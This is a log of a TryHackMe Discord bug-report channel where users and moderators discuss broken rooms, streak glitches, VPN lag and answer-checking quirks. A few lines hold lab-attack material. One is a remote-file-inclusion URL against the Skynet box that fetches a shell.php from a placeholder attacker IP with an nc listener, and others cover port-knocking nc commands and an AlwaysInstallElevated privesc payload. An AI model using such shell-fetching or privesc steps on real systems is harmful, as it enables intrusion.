#site-bugs
Yaa ..
Should I test the forum ? But this will make more useless threads I don't think admin would want that ...
Nah, just wait for Skidy to take a look
RP:PSEmpire needs to be updated in order to include connecting the database Empire cannot start without connecting the database
https://tryhackme.com/thread/5eb89975f6b800761638fe72
@shrewd marsh Fixed
It's a bug I didn't think about
I'll fix tomorrow:)
But the post is fixed for now
Ahh, the images are kinda messed up
Can you please delete it @frosty cape .
Made a request through Add Writeup
Also this thread looks awful 😦
Deleted:)
Thanks 🙂
Hi all, there is a bug in the https://tryhackme.com/room/bof1 room, Tasks 8 & 9 cannot be completed, how can I report this in order to be fixed?
It's been reported before.
wget 10.10.210.60/kali-linux-2020.1b-installer-amd64.iso
my Download speed over ovpn : 111KB/s
wget 3.249.136.48/kali-linux-2020.1b-installer-amd64.iso
My download Speed without ovpn : 3.5Mb/s
i hope someone explain me
this is THM Kali machine i can access over ovpn and internet but speed not same @frosty cape
Answered in #site-support
introtox8664, Task 2, Quad Word q 8 is twice in the table
@sly raft this one's yours I think?
Found other typos, I'd rather send you everything at once
Feel free to DM me @sullen vessel :))
doesn't spawn the webserver
@spiral flame
I left it for an hour
No webserver on 8000
@frosty cape If it's not broken, it's not fully working
Works for me!
I done the same, had it up for 15 minutes and nothing on port 8000
toolrus, "What version of Apache-Coyote is this service using?" should be 7.0.88 and not 1.1. Apache-Coyote/1.1 only means it's using HTTP 1.1
completed all yet its not completed 🙂
https://tryhackme.com/room/rpnmap
Task 3 #4
When scanning with nmap -sV the service version I got is 7.6p1
While the answer is still in format 6.6.1p1
@visual oasis Web Fundamentals track? Have you completed 100% of the rooms? Up top of the room it shows your completion %
no not all but that part I did
I completed the security tools part of web fundamentals
Oh yeah I see what you mean
🙂
Have you refreshed the page?
@visual oasis Burp suite, there's a task that got added
how you get the 7 day streak badge? (i had 20 day in a row on the site doing rooms and don't have it)
i think it was freshly added
aa ok thank you
Hi, I'm trying to do the WebAppSec 101 room and in question 4.4 there is some brute force. I found a user and when I try to log in there is an error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax ....
is that proper behaviour?
Yes
yup it was the case
website is very slow
@frosty cape site ded again btw
oh i thought my internet is slow so i just set my whole Family's internet speed to 100KB each..
is only my case , or the platform is experimenting a big delay in charging ? and send me this message "Down for development"
@covert kernel #announcements
ok @spiral flame thanks man
seems the problem is in whole platform
i received this page when i tried to download my access file again (after change server)
Yes that's what the announcement says
ok 🙂 thanks again
@pearl fable Platform is having issues
oh, ok. Both flags are giving me the same alert. I will wait a while then. Thank you
@pearl fable #announcements for more info
thanks!!
Hey guys, I have a 42 days streak on tryhackme but it appears as 0
Streaks were just pushed today
@frosty cape Any chance of doing that retroactively?
Unfortunately, streaks start from today. I could determine users streaks, but as its a trial, I wasn't sure if its worth it
@novel carbon Dm me your THM username and I can give you your 42 day streak
ok thx Skidy
skidy pls can have my streak too?
Yea lol. I have 19 I think. 😛
Opened a can there 😛
lol
@topaz venture aha I did indeed
Why not
DM me
If you want your streak
if I get more than 10, I'll create a script to do it
@frosty cape Can I DM too? 
it doesn't have the bug hunter role iirc
has done before
give me streak @frosty cape
tweetyctf, the cronjob is definitely not running every 5 minutes
^- this guy is waiting patiently
DM me if you want me to add streaks please:)
Streak on the top left of the profile is not the same as the one of the widget "Yearly Activity" (off by one)
THM Kali not initial
@worldly pagoda what do you mean?
i mean this
but i waiting about 10 mins not happen
not help exactly my Percentage is -13492%
Feature not a bug 😄
yeah it does 😆
yes
my kali vm seems to be quite laggy and forces me to reconnect quite often just over the past week, is there a fix i could do on my end?
please fix your machines they are laging
@topaz sorrel @sinful relic What countries are you in? -- I'm working on adding "in-browser" servers in the US and AU to speed it up
@frosty cape im from India
why i see Access in Browser for THM Kali in 6021s ?
It's a bit of a known bug - Ctrl + F5 your browser and if it is still present, terminate and redeploy the instance @worldly pagoda 🙂
i did but not helped should i wait 5000s to view on my Browser
Nope, can you view the developer console of your browser? see if there are any errors?
A screen shot might be a bit nicer ^^
Yes
Mhm thanks! I can't see anything obvious. Sorry for the ping @frosty cape but this is your sorta thing, is there anything troubleshoot wise I'm missing?
redeploy and force refresh hasn't worked
Try incognito mode in your chrome browser perhaps? @worldly pagoda
i did but not helped @topaz venture
Mhm interesting. Thanks for giving it a go. Hopefully Skidy will be able to help out when he gets a chance 🙂 I've pinged him so he'll see it as and when he can ^^
Thanks for take your time
It looks like you've extended it rather than terminating - is that right?
🙂
@worldly pagoda Hi there - can we diagnose this problem together? When you're around, please let me know:)
@frosty cape sorry for delay, i'm from UK
And it was lagging for you?
it is lagging 8/10 uses, sometimes disconnecting me
When it lags again for you, please @ me so I can see what the issue is.
Thanks Skidy!
no problem
@covert kernel #room-help
should i move this question to community-help? @spiral flame
@covert kernel That was the idea.
ok ok i will delete here then sorry :c
No, that's just the html entity for < (less than sign), HTML is weird with things like the opening angle bracket(due to how HTML is written)
@unkempt herald It's a bug with the platform ye, I can't fix it in the room
Skidy's XSS filtering
Is a problem
It's also our fault
We didn't XSS that
I can't remember, was it the answer field or the hints we XSSd?
It was one of them
answer field was for you
Pretty sure it was all tightened up after that though
Yeah it was the answer field
well might as well share something you guys can fix then
I love when my TLS sings.
learnburp room
@frosty cape plz fix
@unkempt herald We can only fix rooms that we created
webfundamentals was me
I'll check that task tho
I say "you guys" as a collective entity. IDK who is responsible for what. I'm a scrub.
Anything created by "TryHackMe" is the admins
A lot of the other larger rooms come from the mod team though
Ah I see. Author is "ben [ADMIN]"
singing
mr.robot room is broken
first known issues
2nd machine after restart doesnt work
blocked ports
I have vpn connection
Someone suffering from problems with the WebAppSec 101 room?
@covert kernel It goes off the page
Yeah
There's nothing I can do about that
Jwt tokens are long
And to keep it distinct from the other text on the page I kept it in code blocks
Well blame skidy then
One character off with JWT exploits will mess everything up
So I decided to take the style hit for more practicality
^
But if @frosty cape could update the CSS so it still looked good it'd be great
trust me,
you'll love jwt
New room ZTH obscure web vulns. Task 4
Oh no it's already started
kekw
lol
oups
😛

Skidy plz
I know input validation ruins the fun
But at least do it clientside
Because I will break your statistics
Hi. Im trying to do Google Dorking room. And there is question: What "Page Score" does the Domain receive out of 100? Is there any possibility tha score changed?
I think the answer is simple
but is not valid
@weak vessel No, it won't have changed
Read the answer format
And add /100 to the end of your score because it's out of 100
box Plethora, JuiceShop's code execution using SSTI does not work on THM's instance (the docker container is broken in some way?)
@sullen vessel It's a known issue with JuiceShop and docker
Get the flag by rooting the host 😉
yep, on my way
@covert kernel Sooo, one of my answers doesn't work and I'm sure it's right
@covert kernel It's the same as 0day, and I think I know why.
i have already answered every question in the RP nessus room, and when i refresh the page, the question appear like i dont answer it
You might want to add the other bit
About how you can't answer because it says you've already answered
is the same msg for every question
@frosty cape pls
@ornate onyx leave and rejoin the room, it won't reset your answers
already done, 30 min ago
having all the questions answered the color of the task still red, and dont count to me like im finish the room
@frosty cape pls
@spiral flame plz what?
They can't complete the room
The page has bugged
basically, they answered all the questions but the frontend doesn't accept that properly?
And the room doesn't complete
@ornate onyx Whats your THM username?
& ty James for the @
Eventually I'll put a detailed message when tagging you
I can read a few messages up, but sometimes still don't get the context of what's going on.
my username is 3stripes
@frosty cape Hi , sorry for delay
REMOTE TRYHACKME ask me Username and password for THM Kali
Need to submit a bug.
@frosty cape Sorry to ping, but I am uncertain about the severity of this bug.
Streaks still seem a bit iffy? I've lost my streak - even shows as my profile as being reset.
even following / being in BST timezone
Today should be my 7th day
submit any bugs to hello@tryhackme.com
so even tho site is down for development
i can still access it if i refresh few times
its not critical but its bug smh
1 more bug is when site is down for development
you can still access rooms
as shown right here
these aren't bugs 🙂
^
which is why you can still access rooms and it still appears
and what about browsing the site at all
like i can still access pages and stuff
even tho it says its down for development
also not a bug because those requests are being routed to different web servers
probably mentioned already but typo in the new room:
"Learn and practice exploiting a range of unique web vulnerabilities such as SSTI, CSRF, JTW and XXE." should be JWT not JTW
@covert kernel lil' one for you pal :3 I can't see it being mentioned before, but if you're already aware of it then sorry for ping!
obscure web vulns badge wasn't generated on my profile
@topaz venture yoyo
Hey, sorry looking back that sounds a lot more serious than it actually is haha @frosty cape
It just shows as being reset on the count next to the yearly activity
Ah gotcha!
No worries:)
It checks the 24h from the last time you answered.
Thank you mate!
So make sure you answer before 1pm tomorrow to build up your streak aha
knockknock, #3, In the pcap file, whats the last port that needs to be "knocked"?, the site expects the answer 8000 while the pcap and the server only opens the port 8888 after knocking 7000, 8000 and 9000
(UNKNOWN) [10.10.23.215] 8 (?) : Connection refused
root@kali:~# nc 10.10.23.215 7000
(UNKNOWN) [10.10.23.215] 7000 (afs3-fileserver) : Connection refused
root@kali:~# nc 10.10.23.215 8000
(UNKNOWN) [10.10.23.215] 8000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 9000
(UNKNOWN) [10.10.23.215] 9000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 8888
/XXXXX/
(UNKNOWN) [10.10.23.215] 8 (?) : Connection refused
root@kali:~# nc 10.10.23.215 7000
(UNKNOWN) [10.10.23.215] 7000 (afs3-fileserver) : Connection refused
root@kali:~# nc 10.10.23.215 8000
(UNKNOWN) [10.10.23.215] 8000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 8888
(UNKNOWN) [10.10.23.215] 8888 (?) : Connection refused
I remember that happening to me too ^^
@covert kernel shouldn't it be changed to pip3 install xsrfprobe ?
since you are talking about python3
it works via pip3 and installing the module from github
up to you how you want to do it
^
but it's not working
SS?
you got default pip?
mhm
true
@frosty cape hey, i've just opened my kali vm for the first time today, attempted to open firefox and i was disconnected
no problem
I'm in the middle of scaling up the in-browser guac servers.
So I can get a good look at whats going on
It disconnected, then you reconnect right?
yeah
And hows the lag?
quite bad
What country are you from again?
The RDP doesn't go through guac right?
Uk
RDP is painfully slow for me normally, I use SSH instead
it has been fine for a week or two, then started getting choppy
See thats really weird
I'm having it work really well.
@spiral flame Can you deploy a Kali machine and see what its like for you?
RDP would have been my troubleshooting step
Yea sure
no i don't
Ok
@frosty cape RDP booted me out and I can't reconnect so RIP
Use the in-browser machine plz
RDP was always laggy for me too
Oh really?
Yep
Try using through the browser
Mind screen recording it?
@frosty cape Uploading, DM you the link?
Yes please:)
Sent
can we fix the upload bug, please?
refresh
change from disabled to enabled?
is that a part of challenge?
@weak vessel Maybe you need to get the admin email right before it'll let you
I've already know admin email
Common Linux Privilege Escalation: Task 5
@vernal dragon
@frosty cape
false alert, i'm dumb (sorry)
call off the hounds! @spiral flame
poor hounds
(it's because some rooms have a public IP so I was trying to connect to it thinking it was the kali vm…)
wat
Not really a big issue, with question input you can type letters after hitting enter for submission and it will show you typed that as the answer, and escape characters are unregistered as characters, so you can add it to your submission anywhere at anytime and it will still be right
If you refresh, it will load the correct answer
@unkempt herald @spiral flame Fixed 🙂

Accessibility issue: Pressing the 'enter' key will not submit an answer in a room
@little scarab It does.
I have a bypass for that issue, just hit the button
"Accessibility" @tired obsidian 😜
@spiral flame It doesn't, are you sure pressing 'enter' will submit an answer?
Which browser did you use? I'm using Chrome 81 and it's sadly not working
🧐 weird
Tried multiple browsers on Mac OS Catalina and I cannot submit an answer without clicking the button. Tried most default keys
MacOS is bad for browser stuff
Does things weird
Even outside of safari, weird stuff happens
It shouldn't
It works on Windows and Linux
That's 99% of people covered
It probably works for others on mac
Now you're guessing 😛
Let's take this discussion elsewhere and leave the bug tip for the people responsible for the development of the app
I've just asked the... 1 other person I know that uses THM on a mac
I filter the bug reports as a mod
Okay so let me summarise this: You have just checked on Windows Chrome v81 if submitting an answer with the enter key works. And it works. Then you checked if it works on Linux and it did. Then you have checked the user statistics of TryHackMe and found out that 99% of the users are using either Windows or Linux. After that you even asked 1 other person using mac to check if it works and it worked for him/her.
If that's true, then that's absolutely great work
But it sounds like this 'filter' is a little opinionated
I'm getting someone to check on macos
But I can confirm it works on Windows and Linux
Have a look at relative market shares
Okay thank you. I don't want to be some nitpicker or smart ass but my actual job is User Experience and front-end development and I do not recognize your statements: "Browsers on Mac OS act weird" & "Mac OS has 1% relative market share"
But hey, I'm here to learn 🤷♂️
@little scarab Have a look at EXIF rotation data
MacOS respects it
Nothing else does
Unless the issue can be reproduced by someone else, there's nothing that can be done
@spiral flame
Heh wow, I'm a long-time user and never experienced that problem. Good to know 😮 thanks
That's indeed 'weird' behaviour haha
Undefined behaviour, I'm sure
I'll ask if we strip-off EXIF data for user uploaded content tomorrow. Because clearly it's important to do so. Damn
But I'm glad you're taking the time to check if the submission issue on Mac OS is reproducible @spiral flame . I would love that feature to work again
I know exactly 1 other person who uses THM and has a mac, so I've asked.
Flag 5 on Task 4 of Hackback2019 doesn't seem to work
webgramming task 9 is a copy of https://github.com/SniperOJ/Jeopardy-Writeups/blob/master/web/web50-as-fast-as-you-can/index.php but i don't see any mention of the original author. Also, the task is broken as it seems that $_SESSION['random_string_create_time'] is never set (I get you cost [1589403787599] msec, which is the current timestamp and not the difference between the timestamp of the second request minus the timestamp of the first request). The task 3 was also never solved except by the author, is it possible to confirm that they were tested?
@final raft Jurassic park? Known issue
Yes, ah thank you
@sullen vessel That room was released before rooms were reviewed
jurassic has its own separate room, hackback should be removed no? 👀
No
do you happen to have access to the ova of webgramming @spiral flame? it would really like to know if they are solvable or just bugged
Please remember, we're discord mods
My power on the site extends to rooms I created, or rooms currently in the review queue
ok, i'll try to find a way to contact the author. thanks :)
ultratech1, task2, #5 The software using the port 8080 is a REST api, -> the server does not expose the port 8080, i guess the question should mention the port 31331 instead
Streaks seem a tad buggy, how are they updated?
@urban flame Its 24 hours from the last time you answered.
Ah okay makes sense
Deploy your own Kali Machine (2020 Version) THM kali
Can't SSH?
Normally means you loaded it somewhere else
its open 1sec and i see disconnected and no i not opened it another browser
i can connect SSH , but Guacamole disconnect me all times
i have this issue with [Task 4] In-browser Kali machine (Old)
[Task 2] Deploy your own Kali Machine (2020 Version) In-Browser is ok
What is Different between Task 2 and Task4 in THM Kali Machine ?
Kali versions
Task 4 has massive improvements, but won't come into effect until I push next
Task four is the LXDE desktop environment
Hi @frosty cape , i always Disconnect from Task4 its okey ?
I've fixed this, but it will not work live until I push my latest codebase.
Inbrowser machines are 100% more reliable, I just need to push the code.
Adding some stuff before pushing
It's going to be even better after this push, excited to push this tbh
Im not getting this verification email. dont know if it just takes a while but ive tried for about 45 mins now with a couple diff emails.
@frosty cape ?
and im tryina get a subscription
Please check your spam folder.
i have you think id be asking?
Right ok.
DM me your email and I can check, but looking at our dashboard, we have no pending outgoing emails.
okay i did
On the juiceshop machine the links on the scoreboard are broken
Sometimes that happens, go to the dashboard and use the resend link
Which resend link?
I am talking about the hyperlinks behind the hints
For example: https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/sensitive-data-exposure.html#access-a-confidential-document
None of the flags work on Jigsaw
@tired obsidian Jigsaw 1 or Jigsaw 2?
1
Yeah I just figured that out
The Corp machine's Administrator password is expired, and cant be changed. However I was able to read Administrator flag without privesc. Is that left intentionally or a wrong permission?
@fringe girder Reading it is the privesc
I mean I was able to read Administrator flag without privesc from the 2nd user.
Oh, not sure
How do I submit the bug?
Right here
We've taken note of it
But it's weird
I tried to do that during testing
Got permission denied
Wonder why it's working for you
Not sure me either
Could you reset the box and try again
I tried 2 times and still works.
Really weird
You don't have to escalate on that box
the priv esc from what I remember is token impersonation unless I'm mistaken
I thought it was unattended upgrades?
Still works same unintended way. I just checked it.
Shows me UAC but I can click continue and im in admin directory
Yeah
Iron corp or corp? @fringe girder @covert kernel
They're two different rooms
One is spookysec, one is seth
iron corp I can discuss to some detail, corp I have no clue
Corp was unattended upgrades privesc
It is Corp.
@covert kernel Can you amend your submission plz
Submission amended
@torpid shoal Can you confirm this is a mistake on your room according to these posts ? https://discordapp.com/channels/521382216299839518/522158539129618453/710597826979037314
Not a bug
It gives you an elevated meterpreter because the msi runs as admin due to AlwaysInstallElevated
Adding a user is a slightly different payload
Looks like that part might have been missed
May be I misunderstand because of my poor English level ^^
It is missing a payload that adds the user as an administrator, which that article highlights
@autumn wave Any chance you could highlight this to tcm when they're around?
Thanks for your answer/help/article @spiral flame
Yea I'll say something to him.
Cheers
My bad
Its from the old way I had it
Which was a CMD payload
3 just needs to be omitted
Will add that to the todo list
Ty
@frosty cape Thanks for catching that
There is a bug with streaks, I'm uploading the fix (along with a whole host of other things) in the next hour.
@topaz venture "anon" now changed to "anonymous" on the FTP subsection for networkservices. Hopefully that will resolve the issues related to the login 🙂
Refreshing fixes it but still
bug fixed in the privesc arena, thanks again
JokerCTF has no lxc containers installed, I can see one sometimes but it disappears before I can start it, other times it just doesn't show up at all.
I've restarted the room 5 times now
https://tryhackme.com/room/bebop task 2 question 1 in hints nice words "are there are" 😂
its not a bug but you get the point lol
@vernal dragon Thanks Polo! Much appreciated buddy :3
Nah that one is mine, was my first so was expecting something like this to pop up eventually, gimme 30 mins
i'm sorry for that ^^
yah sry for that dan @tribal knoll
Flag 1 of task 4 of hackback2019( https://tryhackme.com/room/hackback2019 ) does not seem to work, the flag works in the standalone version of the box( https://tryhackme.com/room/jurassicpark )
Yet looking at the leaderboard for hackback2019 people seemed to have managed to answer the question correctly?
the first flag is different
you need to get it from the hackback box
no idea why they are different
I submitted the flag from the hackback machine
@short jackal Looking at the leaderboard you have managed to complete the task, can I pm you to check if my flag is correct?
sure
@rugged ermine was the hackback jurrassicpark vm copied to be used on the jurrasic park room? they were a tad different but now they're essentially the same
Yeah it's the same VM
When we had less resources as we started several of our initial VMs were reused for competitions prior to a bulk release
@rugged ermine Can you please fix(read the last 6-7 comments please) 🙂
Just curious, for some reason I didn't get the extra points for Borderlands (I'm assuming this is due to the points update) I did Borderlands 2+ months ago.
Hello guys are you there?
@covert kernel ...
I have a quick question. I accidentally logged out and now in any machine (in my kali or other machine) i got a prompt "REMOTE TRYHACKME". Which password and login i must type?
@covert kernel terminate and redeploy
i tried but still the same 😦 ..... so.. once again?
Sure.
ok, thank You guys.. have a nice evening
ok, thanks, i try with another machine and connect from my personal computer kali linux
Bebop points glitched. Just done full clear and got 56. While most others have 210
Before walkthroughs were worth less points
The points changes don't count retroactively
James, I'm aware. This still needs to be fixed via a script however
The retroactive points thing is a known issue
I've brought it up with Skidy a number of times
How the points system work? optional have only 8 points for each solved task?
room skynet
@fresh tide Walkthroughs are worth 8pts/q
Skidy's busy so I don't know what we can do about it if it's broken
I don't envy the guy when comes back
i think this should be fixed as JWT
What about the widely known JTW bug?
i can't paste from my machine to Optimised THM Kali
Is TryHackMe limited to one IP? (can't remember if I read that on here or somewhere else), but either way, I realized when I reset my password it didn't log me out of my other computer, is this intentional or?
Probably an oversight with session cookies
@feral flame Shouldn't be, no. I'm usually signed in on a bunch of different browsers/machines
Right, sleepy talk, meant to say IP
Aha -- fair. Every chance I misread too 😛
Yeah, that does seem like a bit of a security flaw
Skidy is away just now, and I reckon he's received enough pings already, so I won't ping him just now about it
Worth bringing up when he's back though 🙂
In room "Blaster", after RDPing to the machine the IE history is empty when it should contain a search for a CVE
@spiral flame What do you mean?
@spiral flame i did the same questions but me and everyone else in the room got 30 points each question
Guys.. i have a problem with my vpn connection
i regenerated my config file and download.
Initialization sequence complete.
but in ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 76329 bytes 65909155 (62.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 80045 bytes 15756215 (15.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ok restart helps 🙂
i found the solution.. just after kali upgrade it created just new tunnels tun1 tun2 tun3 etc
hi
hey everyone
@brave plaza hi
Close @strong carbon, the key term the answer is looking for is throughout the text for that task 🙂
didnt get your point
@strong carbon it's not a bug, your answer isn't right
Hey, I was on a streak for 5 days. Today I logged in again & I completed 1 room, but my streak has been reset. Looks like a bug
Streaks are crazy buggy
I'm having the same issue ~ after the 5th streak it reset.
@covert kernel THM Trick to not let you get 5% off Swag.
the room "zthlinux" called Learn Linux got 1 bugged question. Task 10 the first question it asking for a answer but you cant fill it in.
but it asks a question so i want to fill something in 😄
@indigo hare Just click the button
i already did but just wanted to mention it, it feels wrong. thx
DM me your answer and I can tell you if you're right
What did I do this time@spiral flame
@indigo hare 👍
why some times THM Kali ask me Remote Username Password for Guacamole ? and whats that ? like i logout from THM Kali in Browser
This room at task 8
It required msfvenom to answer the question
but the machine doesnt have msfvenom installed
@spare timber Not a bug, run msfvenom on your host machine
@spare timber Google, your 24x7 assistant can answer this.
@mighty night What does Google have to do with this? You're supposed to run the command on your host machine.
The boxes don't have internet access so you can not install msfvenom if that is what you're thinking.
@median sapphire Oh, Sorry I didn't see that. I thought that he is running "msfvenom" in his machine. But now I saw that he is running it on target machine.
@median sapphire thanks, I was thinking host machine as the deployed machine. My bad english sorry
Hello everybody, in the room https://tryhackme.com/room/rfirmware (room created in 2019), the firmware download has been updated by Linksys on 5/1/2020 so it's impossible to do the room because CRC or creation date changed (Task2: #6,#7,#8,#9,#10 impacted)
I have a confirmation that the file is no longer available on their website so This room is impossible to complete.
Hello, I'm having an issue with Anthem room, it's freezing after 1 hour of usage, even after extending the time, still freezes
won't even respond to pings anymore after 1 hour
I am having an issue with the room blue, it's at 100% but its not showing as complete?
Same as Dalist-. The machine automatically shuts down. ||I was connected through RDP and the Shutting Down screen appeared||
it might be something with windows boxes i think
Hi, the Metasploit room, task 4, #3 has a typo in the correct answer. The accepted answer is auxilliary, correct spelling should be auxiliary.
@frosty cape Thanks for letting me know, I'll go update the tasks!
I'll try to get a mirror of it this time so it wont be an issue in the future.
@tired obsidian that was just to avoid the answer format giving it away
I noticed because it was used in further questions, that's why I deleted it
@hazy stratus Or else you can make it available on download (with the download button)
I'm not comfortable hosting it on TryHackMe because its Linksys IP
Okok
id rather have it on github, there's a null chance GitHub will pull it
You could just put it up on mediafire, dropbox, google drive, onedrive...
Again, IP rights
And there's bound to be another copy of it online
Doesn't make it ok
To be fair I don't know about the context of this, all I know is there's a missing file we need
kekw
i think i found a bug in the basic pentest machine.
so when i cat the /<user>/flag.txt i get permission denied. but when i vim it, it opens.
as I instinctively use vim i kinda opened the flag without any privesc and was very confused.
@ebon oyster Is Vim SUID?
did the find -perm 4000 but didn't yield any result. I thought that too.
should i do that one more time to confirm? @spiral flame
yeah i started from / but i may be wrong let me just quickly verify.
jan@basic2:~$ find / -perm 4000 -type f 2> /dev/null
jan@basic2:~$ vim /home/kay/pass.bak
-opens-
@spiral flame
ls -lah /home/kay/pass.bak
oh ohk.. /4000 gives
jan@basic2:/home/kay$ find / -perm /4000 -type f 2> /dev/null | grep vim
/usr/bin/vim.basic
yeah.. but never saw any of the articles with /4000 i will read about it. thanks
You were looking for permissions that were exactly 4000 I think
yeah got it. thanks @spiral flame
sir the room has a problem
theres only one port open
111/tcp open rpcbind
but the task 6 asks us to visit the machine with 3000 port open
It does not have a problem
Deploy the correct VM
Give it 5+ mins to load the service
linux challenges room is vip but appears in hacktivity free only and when clicked it added to "my rooms" + redirecting to why subscribe page, bug ?
it seems to have happened to quite a few people
it wants to be free
it wants to be replaced.
lol
badges are not retro-actively awarded. eg. i finished zthobscurewebvulns before the badge was created, and i did not obtain it
@sullen vessel Whats your THM username?
swapgs
@sullen vessel There we go: https://tryhackme.com/p/swapgs
@frosty cape wb
ty
\o thanks
When tasks are deleted from a room the task number order does not correct itself
Ah yes, thats annoying.
I'll fix that, for the moment, switch the tasks round and it will update.
Switching the tasks around is also buggy. Say I want to swap two different tasks that are right next to each other: it moves all of the tasks around seemingly randomly, and I have to fiddle with it for a couple of minutes for the tasks to be where I want them to be
I just fixed the tasks not being re-ordered locally - will be made live in our next code push
Let me look into the buggy task swapping too whilst I am at it.
Create task from tasks view when
when I get time / have a smaller to-do list :)
I'm fairly new to THM (a month or so) and finished the Learning Path "Complete beginner". However, the Web Application Security part is colored red, but all rooms have been completed (they have the little green tick next to them), so the learning path is not completing... Any chance anyone could have a look at this?
@shrewd stone Burp suite
There was a question added
It doesn't require an answer.
So when you are selecting a country, and you switch your country to one that isn't in the options, and the country you typed in the params is in Chinese letters, it doesn't display
I forgot to mention: instead of Chinese letters it displays ') or "), I don't remember, I'm writing this from my phone
This is known
My streak reset even though I completed a room/question in the last 3 days. Was about to do my next question. Is there something else I need to know about the timing?
I have a weird bug to report with a room I'm creating. One of the questions asks users to extract a hash from /etc/shadow and it's in the UNIX crypt SHA-512 format, e.g. $6$350c16b54a1be3de$8vD4hy9ER4zOvQF3HXE2uZBTL3qwkv51WLVdEZf4lWIl5qrPjiOhut8ZUI0NRtqtx0y.BV/yoOyJELmr.G8hR/
However during testing someone noticed that they could submit the hash without the first $ and it was marked correct. I just experimented with it and I could submit everything beyond the final $ (i.e. 8vD4hy9ER4zOvQF3HXE2uZBTL3qwkv51WLVdEZf4lWIl5qrPjiOhut8ZUI0NRtqtx0y.BV/yoOyJELmr.G8hR/) and have the answer marked as correct.
Trimming characters from the end of the string doesn't have the same effect. I'm wondering if it's something to do with the $ specifically? Only thing that springs to mind is some regex weirdness in the check maybe?
I think it's the regex for the answer
@heady cosmos You're correct, the regex allows some tolerance in the answer.
ah I see, yeah that explains some things then. Would be nice to have exact answers or at least know the tolerances but I can work with this 🙂
hello i'm new here
@west wolf Hi, do you have a bug to report?
ok sorry for that
Badge hasn't been added to my profile. been like this for over a week now.
It happens
why
IDK
@rare swallow https://tryhackme.com/p/Chevalier (added)
it is saying 404 it is gone into a matrix
@edgy raptor Which game is this?
@N3ko Please let me know when you have finished updating the room so that I don't forget to finish it ^^
will do
@frosty cape thanks dude
Can someone tell me why SSH is so slow
Not a bug, wrong chat
Which chat?
When a machine expires, I have to reload the page for the deploy button to work (it stays greyed out otherwise).
yes, known issue
my streak went from 2 to 1 ? i've been active these last 3 days...
@covert kernel They're being fixed
🆗
This is kind of unclear?
!*
you're a ninja harry
did you sit on my cake
Pictures do not correctly center on an actual room page however they are centered in the room manager
hey there's a bug in Offline Machine
there were only 8 flags in it
and i don't know how i submitted 9 flags
come and witness it https://tryhackme.com/games/koth/3067
@covert kernel And what bug have you found?
machine vulnversity
if i tried to type answer format .phtml which is correct
i have a Uh-oh! Undefined
Could this be because the site is "down"?
no i mean, tryhackme.com is down rn
but i'm not 100% sure if that could be the problem
@tender nimbus The website is back up
i have access to site but i cant sucess this thread
just one buggy thread
ok after terminate and new deploy works fine 🙂 thank you for the answer 🙂
it seems that Anthem closes itself down after 1h, not sure the reason why but it has been reported multiple times. @frosty cape is this something that you might know about ?
Hmm, windows

fascinating
it has been reported that even when the user is RDP-ing they see the shutdown screen
I'd hazard a guess it's the api not connecting to the AWS windows service
but that's like
a wild guess
does the windows box have the same issue?
Skidy's confirmed the requests to extend go through
like the other vm for hacking?
Room Network Services, Task 7 , when i Ping my host i not see it in tcpdump ?
@worldly pagoda it does work, not a bug
yes i ping tun0 but not receive it
it works fine. your command might be wrong
hmm
Probably your listener. Make sure you're running the VPN on your attacker, not on the host if you're using a VM
i also try on THM Kali but not received
It wasn't for me
Shiba boxes at learn linux keep crashing when I enter commands
Sounds like a VPN problem @twilit flame
hi , machine SKYNET.. while i listen on nc -lvp , i try the http://target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://ip_adress/shell.php
but not exploited
....
@wanton bramble Head over to #room-help and watch this: https://www.youtube.com/watch?v=53zkBvL4ZB4
@wanton bramble Not a bug.
absolutely not a bug 🙂
but i am not sure editing this shell
how do i edit this shell, can you help me?
If you want help go over to #room-help
Kenobi nmap scan returns the wrong number of ports:
```
Nmap scan report for 10.10.223.245
Host is up (0.18s latency).
Not shown: 65322 closed ports, 202 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33581/tcp open unknown
35515/tcp open unknown
40063/tcp open unknown
52573/tcp open unknown
```
Answer is 7. Listed is 11.
Known issue @vital glen
hıı okey thank you @median sapphire this section is about bugs
@wanton bramble Exactly and this is not a bug, this is a user error, if you want help head over to #room-help no one will help you here.
yes so sorry 🙂 @median sapphire
Can anyone tell me if the .ovpn configs permit or pass-through non 10.10.0.0 traffic (i.e., THM.com rooms)? It's getting kind of annoying switching the VPN on and off to access the web and research rabbitholes.
The VPN should only be routing THM traffic into the network
@shadow sand The VPN uses split tunnelling. It only routes traffic on 10.x.x.x
if you're using virtualbox, the default NAT settings might be interfering as IIRC the gateway is put on that subnet
That's what I figured. I'm running on bare-metal with no virtualization. Just thought I'd confirm what I suspected. Thanks.
@shadow sand If you lose internet with the VPN active, that's on your end. Essentially.
it looks like the writeups submission might be bugged? when hitting the submit button I get this dialog box with and nothing in notifications.
@fair moon Anything in console?
Ok so this needs to be fixed. If you make a room that's sub only (intro to python) You can't view it if your sub expires 😂
I fixed the writeup bug there. I found it a few days ago, will be live in the next few days.
@worthy stag Ahh okay thats true, I'll fix this too aha
Just had a stark reminder that my uni sub ran out yesterday 😂
RIP
Has it been 4-5 months already - wow
Aha! Do they not use it in your 2nd year?
@frosty cape they use it for Ethical Hacking which is a second year module
Yeah I'm resitting second year
decided that due to the virus I'd gain more value redoing the year
rather push for a 1st 2:1
Not sure if you're srs or not
Well, it beats not being in Uni at all - my last year has ended so poorly.
Yeah full seriousness
Had a call with Nick a week or so ago about a bunch of stuff and then sending off my application to suspend study tomorrow
Ah, thats interesting I thought the final year carried so much weight you can make it up (I know people who have bombed 2nd year & are on track to get a first as final year carries more weight)
Yeah idk it just feels weird going into final year with only 3 decent graded modules
@near mason What did you get 2nd year? && You're on track for a 1st now right?
